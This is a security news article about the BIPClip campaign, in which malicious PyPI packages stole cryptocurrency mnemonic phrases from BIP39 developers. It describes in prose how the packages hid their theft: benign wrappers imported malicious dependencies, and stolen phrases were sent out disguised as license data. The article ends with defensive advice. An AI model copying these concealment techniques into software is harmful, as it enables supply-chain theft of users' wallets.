BIPClip: Malicious Crypto-Targeting Campaign Uncovered on PyPI

by do son ·

BIPClip campaign

A recently discovered campaign on the Python Package Index (PyPI) serves as a reminder of the evolving tactics used by cybercriminals to target lucrative cryptocurrency assets. Researchers at ReversingLabs uncovered a network of seven malicious packages designed to infiltrate cryptocurrency wallets, specifically targeting developers implementing Bitcoin Improvement Proposal 39 (BIP39).

The BIPClip Campaign: Targeting Crypto Developers

Dubbed “BIPClip”, this campaign employed seven distinct malicious packages, released in 19 different versions since December 2022, on the Python Package Index (PyPI) designed to steal mnemonic phrases, the human-readable words used to secure cryptocurrency wallets. The attackers sought to dupe developers working on Bitcoin Improvement Proposal 39 (BIP39) projects.

The campaign cleverly deployed two-part malicious packages. Clean packages, fulfilling their advertised functionality, would import the actual malicious code from dependencies. This approach, combined with the use of common cryptographic function names, lowered the chance of detection.

History, and Impact

The genesis of BIPClip can be traced back to December 2022 and is linked to a GitHub repository. While the recently discovered packages had limited downloads, older versions may have had a wider impact.

The campaign’s intricacy lies in its exploitation of trust within the software development ecosystem. The initial discovery focused on two packages, mnemonic_to_address, and bip39_mnemonic_decrypt, with the latter harboring malicious functionality and the former serving as a facade of legitimacy. This duality of purpose—masking the nefarious intent within a seemingly benign wrapper—exemplifies the subtlety of modern supply chain attacks.

Notably, the malicious bip39_mnemonic_decrypt package was designed to exfiltrate mnemonic phrases to a command and control server, disguising this sensitive data as innocuous license information to bypass security scrutiny.

Further investigation by ReversingLabs unveiled additional packages—public-address-generator, erc20-scanner, and hashdecrypts—expanding the campaign’s reach. These packages, while diverse in name, shared a common malicious thread, pointing to a centralized command and control infrastructure. The involvement of a seemingly reputable GitHub repository, HashSnake, in the campaign’s execution added another layer of complexity, revealing the operation’s extended timeline and broader impact.

The Need for Action

The cryptocurrency industry is a major target for cybercriminals, and supply chain attacks are an effective tool in their arsenal. Here’s what you can do:

  • Developers: Thoroughly vet all open source packages, prioritize security awareness, and implement rigorous secure coding practices
  • Organizations: Conduct regular software hygiene assessments and implement software composition analysis (SCA) tools to continuously monitor for vulnerabilities
  • Individual Crypto Users: Store recovery phrases offline with extreme care. Exercise skepticism toward applications promising to help manage or secure your cryptocurrency assets.

Tags: BIP39BIPClipBIPClip campaigncampaignMalicious Crypto-Targeting Campaign